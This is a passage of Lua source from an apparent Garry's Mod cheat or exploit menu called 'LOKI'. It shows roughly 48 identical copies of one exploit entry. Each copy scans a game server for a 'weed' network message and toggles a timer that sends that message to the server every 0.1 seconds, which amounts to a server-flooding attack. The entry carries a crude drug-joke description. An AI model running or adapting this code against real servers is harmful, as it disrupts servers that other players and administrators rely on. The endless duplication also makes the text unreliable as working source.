  2823. { typ = "func", name = "Big Weed", func = function()
  2824. if !timer.Exists( "loki_bonghit" ) then
  2825. timer.Create( "loki_bonghit", 0.1, 0, function()
  2826. net.Start( "weed" )
  2827. net.WriteString( "DUDE" )
  2828. net.SendToServer()
  2829. end)
  2830. else
  2831. timer.Remove( "loki_bonghit" )
  2832. end
  2833. end, },
  2834. },
  2835. } )
  2836.  
  2837. LOKI.AddExploit( "Dude Weed Lmao", {
  2838. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2839. severity = 1,
  2840. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2841. functions = {
  2842. { typ = "func", name = "Big Weed", func = function()
  2843. if !timer.Exists( "loki_bonghit" ) then
  2844. timer.Create( "loki_bonghit", 0.1, 0, function()
  2845. net.Start( "weed" )
  2846. net.WriteString( "DUDE" )
  2847. net.SendToServer()
  2848. end)
  2849. else
  2850. timer.Remove( "loki_bonghit" )
  2851. end
  2852. end, },
  2853. },
  2854. } )
  2855.  
  2856. LOKI.AddExploit( "Dude Weed Lmao", {
  2857. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2858. severity = 1,
  2859. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2860. functions = {
  2861. { typ = "func", name = "Big Weed", func = function()
  2862. if !timer.Exists( "loki_bonghit" ) then
  2863. timer.Create( "loki_bonghit", 0.1, 0, function()
  2864. net.Start( "weed" )
  2865. net.WriteString( "DUDE" )
  2866. net.SendToServer()
  2867. end)
  2868. else
  2869. timer.Remove( "loki_bonghit" )
  2870. end
  2871. end, },
  2872. },
  2873. } )
  2874.  
  2875. LOKI.AddExploit( "Dude Weed Lmao", {
  2876. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2877. severity = 1,
  2878. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2879. functions = {
  2880. { typ = "func", name = "Big Weed", func = function()
  2881. if !timer.Exists( "loki_bonghit" ) then
  2882. timer.Create( "loki_bonghit", 0.1, 0, function()
  2883. net.Start( "weed" )
  2884. net.WriteString( "DUDE" )
  2885. net.SendToServer()
  2886. end)
  2887. else
  2888. timer.Remove( "loki_bonghit" )
  2889. end
  2890. end, },
  2891. },
  2892. } )
  2893.  
  2894. LOKI.AddExploit( "Dude Weed Lmao", {
  2895. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2896. severity = 1,
  2897. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2898. functions = {
  2899. { typ = "func", name = "Big Weed", func = function()
  2900. if !timer.Exists( "loki_bonghit" ) then
  2901. timer.Create( "loki_bonghit", 0.1, 0, function()
  2902. net.Start( "weed" )
  2903. net.WriteString( "DUDE" )
  2904. net.SendToServer()
  2905. end)
  2906. else
  2907. timer.Remove( "loki_bonghit" )
  2908. end
  2909. end, },
  2910. },
  2911. } )
  2912.  
  2913. LOKI.AddExploit( "Dude Weed Lmao", {
  2914. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2915. severity = 1,
  2916. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2917. functions = {
  2918. { typ = "func", name = "Big Weed", func = function()
  2919. if !timer.Exists( "loki_bonghit" ) then
  2920. timer.Create( "loki_bonghit", 0.1, 0, function()
  2921. net.Start( "weed" )
  2922. net.WriteString( "DUDE" )
  2923. net.SendToServer()
  2924. end)
  2925. else
  2926. timer.Remove( "loki_bonghit" )
  2927. end
  2928. end, },
  2929. },
  2930. } )
  2931.  
  2932. LOKI.AddExploit( "Dude Weed Lmao", {
  2933. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2934. severity = 1,
  2935. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2936. functions = {
  2937. { typ = "func", name = "Big Weed", func = function()
  2938. if !timer.Exists( "loki_bonghit" ) then
  2939. timer.Create( "loki_bonghit", 0.1, 0, function()
  2940. net.Start( "weed" )
  2941. net.WriteString( "DUDE" )
  2942. net.SendToServer()
  2943. end)
  2944. else
  2945. timer.Remove( "loki_bonghit" )
  2946. end
  2947. end, },
  2948. },
  2949. } )
  2950.  
  2951. LOKI.AddExploit( "Dude Weed Lmao", {
  2952. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2953. severity = 1,
  2954. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2955. functions = {
  2956. { typ = "func", name = "Big Weed", func = function()
  2957. if !timer.Exists( "loki_bonghit" ) then
  2958. timer.Create( "loki_bonghit", 0.1, 0, function()
  2959. net.Start( "weed" )
  2960. net.WriteString( "DUDE" )
  2961. net.SendToServer()
  2962. end)
  2963. else
  2964. timer.Remove( "loki_bonghit" )
  2965. end
  2966. end, },
  2967. },
  2968. } )
  2969.  
  2970. LOKI.AddExploit( "Dude Weed Lmao", {
  2971. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2972. severity = 1,
  2973. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2974. functions = {
  2975. { typ = "func", name = "Big Weed", func = function()
  2976. if !timer.Exists( "loki_bonghit" ) then
  2977. timer.Create( "loki_bonghit", 0.1, 0, function()
  2978. net.Start( "weed" )
  2979. net.WriteString( "DUDE" )
  2980. net.SendToServer()
  2981. end)
  2982. else
  2983. timer.Remove( "loki_bonghit" )
  2984. end
  2985. end, },
  2986. },
  2987. } )
  2988.  
  2989. LOKI.AddExploit( "Dude Weed Lmao", {
  2990. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2991. severity = 1,
  2992. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2993. functions = {
  2994. { typ = "func", name = "Big Weed", func = function()
  2995. if !timer.Exists( "loki_bonghit" ) then
  2996. timer.Create( "loki_bonghit", 0.1, 0, function()
  2997. net.Start( "weed" )
  2998. net.WriteString( "DUDE" )
  2999. net.SendToServer()
  3000. end)
  3001. else
  3002. timer.Remove( "loki_bonghit" )
  3003. end
  3004. end, },
  3005. },
  3006. } )
  3007.  
  3008. LOKI.AddExploit( "Dude Weed Lmao", {
  3009. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3010. severity = 1,
  3011. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3012. functions = {
  3013. { typ = "func", name = "Big Weed", func = function()
  3014. if !timer.Exists( "loki_bonghit" ) then
  3015. timer.Create( "loki_bonghit", 0.1, 0, function()
  3016. net.Start( "weed" )
  3017. net.WriteString( "DUDE" )
  3018. net.SendToServer()
  3019. end)
  3020. else
  3021. timer.Remove( "loki_bonghit" )
  3022. end
  3023. end, },
  3024. },
  3025. } )
  3026.  
  3027. LOKI.AddExploit( "Dude Weed Lmao", {
  3028. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3029. severity = 1,
  3030. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3031. functions = {
  3032. { typ = "func", name = "Big Weed", func = function()
  3033. if !timer.Exists( "loki_bonghit" ) then
  3034. timer.Create( "loki_bonghit", 0.1, 0, function()
  3035. net.Start( "weed" )
  3036. net.WriteString( "DUDE" )
  3037. net.SendToServer()
  3038. end)
  3039. else
  3040. timer.Remove( "loki_bonghit" )
  3041. end
  3042. end, },
  3043. },
  3044. } )
  3045.  
  3046. LOKI.AddExploit( "Dude Weed Lmao", {
  3047. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3048. severity = 1,
  3049. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3050. functions = {
  3051. { typ = "func", name = "Big Weed", func = function()
  3052. if !timer.Exists( "loki_bonghit" ) then
  3053. timer.Create( "loki_bonghit", 0.1, 0, function()
  3054. net.Start( "weed" )
  3055. net.WriteString( "DUDE" )
  3056. net.SendToServer()
  3057. end)
  3058. else
  3059. timer.Remove( "loki_bonghit" )
  3060. end
  3061. end, },
  3062. },
  3063. } )
  3064.  
  3065. LOKI.AddExploit( "Dude Weed Lmao", {
  3066. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3067. severity = 1,
  3068. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3069. functions = {
  3070. { typ = "func", name = "Big Weed", func = function()
  3071. if !timer.Exists( "loki_bonghit" ) then
  3072. timer.Create( "loki_bonghit", 0.1, 0, function()
  3073. net.Start( "weed" )
  3074. net.WriteString( "DUDE" )
  3075. net.SendToServer()
  3076. end)
  3077. else
  3078. timer.Remove( "loki_bonghit" )
  3079. end
  3080. end, },
  3081. },
  3082. } )
  3083.  
  3084. LOKI.AddExploit( "Dude Weed Lmao", {
  3085. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3086. severity = 1,
  3087. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3088. functions = {
  3089. { typ = "func", name = "Big Weed", func = function()
  3090. if !timer.Exists( "loki_bonghit" ) then
  3091. timer.Create( "loki_bonghit", 0.1, 0, function()
  3092. net.Start( "weed" )
  3093. net.WriteString( "DUDE" )
  3094. net.SendToServer()
  3095. end)
  3096. else
  3097. timer.Remove( "loki_bonghit" )
  3098. end
  3099. end, },
  3100. },
  3101. } )
  3102.  
  3103. LOKI.AddExploit( "Dude Weed Lmao", {
  3104. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3105. severity = 1,
  3106. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3107. functions = {
  3108. { typ = "func", name = "Big Weed", func = function()
  3109. if !timer.Exists( "loki_bonghit" ) then
  3110. timer.Create( "loki_bonghit", 0.1, 0, function()
  3111. net.Start( "weed" )
  3112. net.WriteString( "DUDE" )
  3113. net.SendToServer()
  3114. end)
  3115. else
  3116. timer.Remove( "loki_bonghit" )
  3117. end
  3118. end, },
  3119. },
  3120. } )
  3121.  
  3122. LOKI.AddExploit( "Dude Weed Lmao", {
  3123. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3124. severity = 1,
  3125. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3126. functions = {
  3127. { typ = "func", name = "Big Weed", func = function()
  3128. if !timer.Exists( "loki_bonghit" ) then
  3129. timer.Create( "loki_bonghit", 0.1, 0, function()
  3130. net.Start( "weed" )
  3131. net.WriteString( "DUDE" )
  3132. net.SendToServer()
  3133. end)
  3134. else
  3135. timer.Remove( "loki_bonghit" )
  3136. end
  3137. end, },
  3138. },
  3139. } )
  3140.  
  3141. LOKI.AddExploit( "Dude Weed Lmao", {
  3142. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3143. severity = 1,
  3144. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3145. functions = {
  3146. { typ = "func", name = "Big Weed", func = function()
  3147. if !timer.Exists( "loki_bonghit" ) then
  3148. timer.Create( "loki_bonghit", 0.1, 0, function()
  3149. net.Start( "weed" )
  3150. net.WriteString( "DUDE" )
  3151. net.SendToServer()
  3152. end)
  3153. else
  3154. timer.Remove( "loki_bonghit" )
  3155. end
  3156. end, },
  3157. },
  3158. } )
  3159.  
  3160. LOKI.AddExploit( "Dude Weed Lmao", {
  3161. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3162. severity = 1,
  3163. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3164. functions = {
  3165. { typ = "func", name = "Big Weed", func = function()
  3166. if !timer.Exists( "loki_bonghit" ) then
  3167. timer.Create( "loki_bonghit", 0.1, 0, function()
  3168. net.Start( "weed" )
  3169. net.WriteString( "DUDE" )
  3170. net.SendToServer()
  3171. end)
  3172. else
  3173. timer.Remove( "loki_bonghit" )
  3174. end
  3175. end, },
  3176. },
  3177. } )
  3178.  
  3179. LOKI.AddExploit( "Dude Weed Lmao", {
  3180. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3181. severity = 1,
  3182. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3183. functions = {
  3184. { typ = "func", name = "Big Weed", func = function()
  3185. if !timer.Exists( "loki_bonghit" ) then
  3186. timer.Create( "loki_bonghit", 0.1, 0, function()
  3187. net.Start( "weed" )
  3188. net.WriteString( "DUDE" )
  3189. net.SendToServer()
  3190. end)
  3191. else
  3192. timer.Remove( "loki_bonghit" )
  3193. end
  3194. end, },
  3195. },
  3196. } )
  3197.  
  3198. LOKI.AddExploit( "Dude Weed Lmao", {
  3199. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3200. severity = 1,
  3201. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3202. functions = {
  3203. { typ = "func", name = "Big Weed", func = function()
  3204. if !timer.Exists( "loki_bonghit" ) then
  3205. timer.Create( "loki_bonghit", 0.1, 0, function()
  3206. net.Start( "weed" )
  3207. net.WriteString( "DUDE" )
  3208. net.SendToServer()
  3209. end)
  3210. else
  3211. timer.Remove( "loki_bonghit" )
  3212. end
  3213. end, },
  3214. },
  3215. } )
  3216.  
  3217. LOKI.AddExploit( "Dude Weed Lmao", {
  3218. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3219. severity = 1,
  3220. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3221. functions = {
  3222. { typ = "func", name = "Big Weed", func = function()
  3223. if !timer.Exists( "loki_bonghit" ) then
  3224. timer.Create( "loki_bonghit", 0.1, 0, function()
  3225. net.Start( "weed" )
  3226. net.WriteString( "DUDE" )
  3227. net.SendToServer()
  3228. end)
  3229. else
  3230. timer.Remove( "loki_bonghit" )
  3231. end
  3232. end, },
  3233. },
  3234. } )
  3235.  
  3236. LOKI.AddExploit( "Dude Weed Lmao", {
  3237. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3238. severity = 1,
  3239. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3240. functions = {
  3241. { typ = "func", name = "Big Weed", func = function()
  3242. if !timer.Exists( "loki_bonghit" ) then
  3243. timer.Create( "loki_bonghit", 0.1, 0, function()
  3244. net.Start( "weed" )
  3245. net.WriteString( "DUDE" )
  3246. net.SendToServer()
  3247. end)
  3248. else
  3249. timer.Remove( "loki_bonghit" )
  3250. end
  3251. end, },
  3252. },
  3253. } )
  3254.  
  3255. LOKI.AddExploit( "Dude Weed Lmao", {
  3256. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3257. severity = 1,
  3258. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3259. functions = {
  3260. { typ = "func", name = "Big Weed", func = function()
  3261. if !timer.Exists( "loki_bonghit" ) then
  3262. timer.Create( "loki_bonghit", 0.1, 0, function()
  3263. net.Start( "weed" )
  3264. net.WriteString( "DUDE" )
  3265. net.SendToServer()
  3266. end)
  3267. else
  3268. timer.Remove( "loki_bonghit" )
  3269. end
  3270. end, },
  3271. },
  3272. } )
  3273.  
  3274. LOKI.AddExploit( "Dude Weed Lmao", {
  3275. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3276. severity = 1,
  3277. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3278. functions = {
  3279. { typ = "func", name = "Big Weed", func = function()
  3280. if !timer.Exists( "loki_bonghit" ) then
  3281. timer.Create( "loki_bonghit", 0.1, 0, function()
  3282. net.Start( "weed" )
  3283. net.WriteString( "DUDE" )
  3284. net.SendToServer()
  3285. end)
  3286. else
  3287. timer.Remove( "loki_bonghit" )
  3288. end
  3289. end, },
  3290. },
  3291. } )
  3292.  
  3293. LOKI.AddExploit( "Dude Weed Lmao", {
  3294. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3295. severity = 1,
  3296. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3297. functions = {
  3298. { typ = "func", name = "Big Weed", func = function()
  3299. if !timer.Exists( "loki_bonghit" ) then
  3300. timer.Create( "loki_bonghit", 0.1, 0, function()
  3301. net.Start( "weed" )
  3302. net.WriteString( "DUDE" )
  3303. net.SendToServer()
  3304. end)
  3305. else
  3306. timer.Remove( "loki_bonghit" )
  3307. end
  3308. end, },
  3309. },
  3310. } )
  3311.  
  3312. LOKI.AddExploit( "Dude Weed Lmao", {
  3313. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3314. severity = 1,
  3315. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3316. functions = {
  3317. { typ = "func", name = "Big Weed", func = function()
  3318. if !timer.Exists( "loki_bonghit" ) then
  3319. timer.Create( "loki_bonghit", 0.1, 0, function()
  3320. net.Start( "weed" )
  3321. net.WriteString( "DUDE" )
  3322. net.SendToServer()
  3323. end)
  3324. else
  3325. timer.Remove( "loki_bonghit" )
  3326. end
  3327. end, },
  3328. },
  3329. } )
  3330.  
  3331. LOKI.AddExploit( "Dude Weed Lmao", {
  3332. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3333. severity = 1,
  3334. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3335. functions = {
  3336. { typ = "func", name = "Big Weed", func = function()
  3337. if !timer.Exists( "loki_bonghit" ) then
  3338. timer.Create( "loki_bonghit", 0.1, 0, function()
  3339. net.Start( "weed" )
  3340. net.WriteString( "DUDE" )
  3341. net.SendToServer()
  3342. end)
  3343. else
  3344. timer.Remove( "loki_bonghit" )
  3345. end
  3346. end, },
  3347. },
  3348. } )
  3349.  
  3350. LOKI.AddExploit( "Dude Weed Lmao", {
  3351. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3352. severity = 1,
  3353. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3354. functions = {
  3355. { typ = "func", name = "Big Weed", func = function()
  3356. if !timer.Exists( "loki_bonghit" ) then
  3357. timer.Create( "loki_bonghit", 0.1, 0, function()
  3358. net.Start( "weed" )
  3359. net.WriteString( "DUDE" )
  3360. net.SendToServer()
  3361. end)
  3362. else
  3363. timer.Remove( "loki_bonghit" )
  3364. end
  3365. end, },
  3366. },
  3367. } )
  3368.  
  3369. LOKI.AddExploit( "Dude Weed Lmao", {
  3370. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3371. severity = 1,
  3372. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3373. functions = {
  3374. { typ = "func", name = "Big Weed", func = function()
  3375. if !timer.Exists( "loki_bonghit" ) then
  3376. timer.Create( "loki_bonghit", 0.1, 0, function()
  3377. net.Start( "weed" )
  3378. net.WriteString( "DUDE" )
  3379. net.SendToServer()
  3380. end)
  3381. else
  3382. timer.Remove( "loki_bonghit" )
  3383. end
  3384. end, },
  3385. },
  3386. } )
  3387.  
  3388. LOKI.AddExploit( "Dude Weed Lmao", {
  3389. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3390. severity = 1,
  3391. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3392. functions = {
  3393. { typ = "func", name = "Big Weed", func = function()
  3394. if !timer.Exists( "loki_bonghit" ) then
  3395. timer.Create( "loki_bonghit", 0.1, 0, function()
  3396. net.Start( "weed" )
  3397. net.WriteString( "DUDE" )
  3398. net.SendToServer()
  3399. end)
  3400. else
  3401. timer.Remove( "loki_bonghit" )
  3402. end
  3403. end, },
  3404. },
  3405. } )
  3406.  
  3407. LOKI.AddExploit( "Dude Weed Lmao", {
  3408. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3409. severity = 1,
  3410. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3411. functions = {
  3412. { typ = "func", name = "Big Weed", func = function()
  3413. if !timer.Exists( "loki_bonghit" ) then
  3414. timer.Create( "loki_bonghit", 0.1, 0, function()
  3415. net.Start( "weed" )
  3416. net.WriteString( "DUDE" )
  3417. net.SendToServer()
  3418. end)
  3419. else
  3420. timer.Remove( "loki_bonghit" )
  3421. end
  3422. end, },
  3423. },
  3424. } )
  3425.  
  3426. LOKI.AddExploit( "Dude Weed Lmao", {
  3427. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3428. severity = 1,
  3429. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3430. functions = {
  3431. { typ = "func", name = "Big Weed", func = function()
  3432. if !timer.Exists( "loki_bonghit" ) then
  3433. timer.Create( "loki_bonghit", 0.1, 0, function()
  3434. net.Start( "weed" )
  3435. net.WriteString( "DUDE" )
  3436. net.SendToServer()
  3437. end)
  3438. else
  3439. timer.Remove( "loki_bonghit" )
  3440. end
  3441. end, },
  3442. },
  3443. } )
  3444.  
  3445. LOKI.AddExploit( "Dude Weed Lmao", {
  3446. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3447. severity = 1,
  3448. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3449. functions = {
  3450. { typ = "func", name = "Big Weed", func = function()
  3451. if !timer.Exists( "loki_bonghit" ) then
  3452. timer.Create( "loki_bonghit", 0.1, 0, function()
  3453. net.Start( "weed" )
  3454. net.WriteString( "DUDE" )
  3455. net.SendToServer()
  3456. end)
  3457. else
  3458. timer.Remove( "loki_bonghit" )
  3459. end
  3460. end, },
  3461. },
  3462. } )
  3463.  
  3464. LOKI.AddExploit( "Dude Weed Lmao", {
  3465. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3466. severity = 1,
  3467. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3468. functions = {
  3469. { typ = "func", name = "Big Weed", func = function()
  3470. if !timer.Exists( "loki_bonghit" ) then
  3471. timer.Create( "loki_bonghit", 0.1, 0, function()
  3472. net.Start( "weed" )
  3473. net.WriteString( "DUDE" )
  3474. net.SendToServer()
  3475. end)
  3476. else
  3477. timer.Remove( "loki_bonghit" )
  3478. end
  3479. end, },
  3480. },
  3481. } )
  3482.  
  3483. LOKI.AddExploit( "Dude Weed Lmao", {
  3484. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3485. severity = 1,
  3486. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3487. functions = {
  3488. { typ = "func", name = "Big Weed", func = function()
  3489. if !timer.Exists( "loki_bonghit" ) then
  3490. timer.Create( "loki_bonghit", 0.1, 0, function()
  3491. net.Start( "weed" )
  3492. net.WriteString( "DUDE" )
  3493. net.SendToServer()
  3494. end)
  3495. else
  3496. timer.Remove( "loki_bonghit" )
  3497. end
  3498. end, },
  3499. },
  3500. } )
  3501.  
  3502. LOKI.AddExploit( "Dude Weed Lmao", {
  3503. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3504. severity = 1,
  3505. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3506. functions = {
  3507. { typ = "func", name = "Big Weed", func = function()
  3508. if !timer.Exists( "loki_bonghit" ) then
  3509. timer.Create( "loki_bonghit", 0.1, 0, function()
  3510. net.Start( "weed" )
  3511. net.WriteString( "DUDE" )
  3512. net.SendToServer()
  3513. end)
  3514. else
  3515. timer.Remove( "loki_bonghit" )
  3516. end
  3517. end, },
  3518. },
  3519. } )
  3520.  
  3521. LOKI.AddExploit( "Dude Weed Lmao", {
  3522. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3523. severity = 1,
  3524. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3525. functions = {
  3526. { typ = "func", name = "Big Weed", func = function()
  3527. if !timer.Exists( "loki_bonghit" ) then
  3528. timer.Create( "loki_bonghit", 0.1, 0, function()
  3529. net.Start( "weed" )
  3530. net.WriteString( "DUDE" )
  3531. net.SendToServer()
  3532. end)
  3533. else
  3534. timer.Remove( "loki_bonghit" )
  3535. end
  3536. end, },
  3537. },
  3538. } )
  3539.  
  3540. LOKI.AddExploit( "Dude Weed Lmao", {
  3541. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3542. severity = 1,
  3543. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3544. functions = {
  3545. { typ = "func", name = "Big Weed", func = function()
  3546. if !timer.Exists( "loki_bonghit" ) then
  3547. timer.Create( "loki_bonghit", 0.1, 0, function()
  3548. net.Start( "weed" )
  3549. net.WriteString( "DUDE" )
  3550. net.SendToServer()
  3551. end)
  3552. else
  3553. timer.Remove( "loki_bonghit" )
  3554. end
  3555. end, },
  3556. },
  3557. } )
  3558.  
  3559. LOKI.AddExploit( "Dude Weed Lmao", {
  3560. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3561. severity = 1,
  3562. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3563. functions = {
  3564. { typ = "func", name = "Big Weed", func = function()
  3565. if !timer.Exists( "loki_bonghit" ) then
  3566. timer.Create( "loki_bonghit", 0.1, 0, function()
  3567. net.Start( "weed" )
  3568. net.WriteString( "DUDE" )
  3569. net.SendToServer()
  3570. end)
  3571. else
  3572. timer.Remove( "loki_bonghit" )
  3573. end
  3574. end, },
  3575. },
  3576. } )
  3577.  
  3578. LOKI.AddExploit( "Dude Weed Lmao", {
  3579. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3580. severity = 1,
  3581. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3582. functions = {
  3583. { typ = "func", name = "Big Weed", func = function()
  3584. if !timer.Exists( "loki_bonghit" ) then
  3585. timer.Create( "loki_bonghit", 0.1, 0, function()
  3586. net.Start( "weed" )
  3587. net.WriteString( "DUDE" )
  3588. net.SendToServer()
  3589. end)
  3590. else
  3591. timer.Remove( "loki_bonghit" )
  3592. end
  3593. end, },
  3594. },
  3595. } )
  3596.  
  3597. LOKI.AddExploit( "Dude Weed Lmao", {
  3598. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3599. severity = 1,
  3600. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3601. functions = {
  3602. { typ = "func", name = "Big Weed", func = function()
  3603. if !timer.Exists( "loki_bonghit" ) then
  3604. timer.Create( "loki_bonghit", 0.1, 0, function()
  3605. net.Start( "weed" )
  3606. net.WriteString( "DUDE" )
  3607. net.SendToServer()
  3608. end)
  3609. else
  3610. timer.Remove( "loki_bonghit" )
  3611. end
  3612. end, },
  3613. },
  3614. } )
  3615.  
  3616. LOKI.AddExploit( "Dude Weed Lmao", {
  3617. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3618. severity = 1,
  3619. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3620. functions = {
  3621. { typ = "func", name = "Big Weed", func = function()
  3622. if !timer.Exists( "loki_bonghit" ) then
  3623. timer.Create( "loki_bonghit", 0.1, 0, function()
  3624. net.Start( "weed" )
  3625. net.WriteString( "DUDE" )
  3626. net.SendToServer()
  3627. end)
  3628. else
  3629. timer.Remove( "loki_bonghit" )
  3630. end
  3631. end, },
  3632. },
  3633. } )
  3634.  
  3635. LOKI.AddExploit( "Dude Weed Lmao", {
  3636. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3637. severity = 1,
  3638. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3639. functions = {
  3640. { typ = "func", name = "Big Weed", func = function()
  3641. if !timer.Exists( "loki_bonghit" ) then
  3642. timer.Create( "loki_bonghit", 0.1, 0, function()
  3643. net.Start( "weed" )
  3644. net.WriteString( "DUDE" )
  3645. net.SendToServer()
  3646. end)
  3647. else
  3648. timer.Remove( "loki_bonghit" )
  3649. end
  3650. end, },
  3651. },
  3652. } )
  3653.  
  3654. LOKI.AddExploit( "Dude Weed Lmao", {
  3655. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3656. severity = 1,
  3657. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3658. functions = {
  3659. { typ = "func", name = "Big Weed", func = function()
  3660. if !timer.Exists( "loki_bonghit" ) then
  3661. timer.Create( "loki_bonghit", 0.1, 0, function()
  3662. net.Start( "weed" )
  3663. net.WriteString( "DUDE" )
  3664. net.SendToServer()
  3665. end)
  3666. else
  3667. timer.Remove( "loki_bonghit" )
  3668. end
  3669. end, },
  3670. },
  3671. } )
  3672.  
  3673. LOKI.AddExploit( "Dude Weed Lmao", {
  3674. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3675. severity = 1,
  3676. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3677. functions = {
  3678. { typ = "func", name = "Big Weed", func = function()
  3679. if !timer.Exists( "loki_bonghit" ) then
  3680. timer.Create( "loki_bonghit", 0.1, 0, function()
  3681. net.Start( "weed" )
  3682. net.WriteString( "DUDE" )
  3683. net.SendToServer()
  3684. end)
  3685. else
  3686. timer.Remove( "loki_bonghit" )
  3687. end
  3688. end, },
  3689. },
  3690. } )
  3691.  
  3692. LOKI.AddExploit( "Dude Weed Lmao", {
  3693. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3694. severity = 1,
  3695. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3696. functions = {
  3697. { typ = "func", name = "Big Weed", func = function()
  3698. if !timer.Exists( "loki_bonghit" ) then
  3699. timer.Create( "loki_bonghit", 0.1, 0, function()
  3700. net.Start( "weed" )
  3701. net.WriteString( "DUDE" )
  3702. net.SendToServer()
  3703. end)
  3704. else
  3705. timer.Remove( "loki_bonghit" )
  3706. end
  3707. end, },
  3708. },
  3709. } )
  3710.  
  3711. LOKI.AddExploit( "Dude Weed Lmao", {
  3712. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3713. severity = 1,
  3714. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3715. functions = {
  3716. { typ = "func", name = "Big Weed", func = function()
  3717. if !timer.Exists( "loki_bonghit" ) then
  3718. timer.Create( "loki_bonghit", 0.1, 0, function()
  3719. net.Start( "weed" )
  3720. net.WriteString( "DUDE" )
  3721. net.SendToServer()
  3722. end)
  3723. else
  3724. timer.Remove( "loki_bonghit" )
  3725. end
  3726. end, },
  3727. },
  3728. } )
  3729.  
  3730. LOKI.AddExploit( "Dude Weed Lmao", {
  3731. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3732. severity = 1,
  3733. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3734. functions = {
  3735. { typ = "func", name = "Big Weed", func = function()
  3736. if !timer.Exists( "loki_bonghit" ) then
  3737. timer.Create( "loki_bonghit", 0.1, 0, function()
  3738. net.Start( "weed" )
  3739. net.WriteString( "DUDE" )
  3740. net.SendToServer()
  3741. end)
  3742. else
  3743. timer.Remove( "loki_bonghit" )
  3744. end
  3745. end, },
  3746. },
  3747. } )
  3748.  
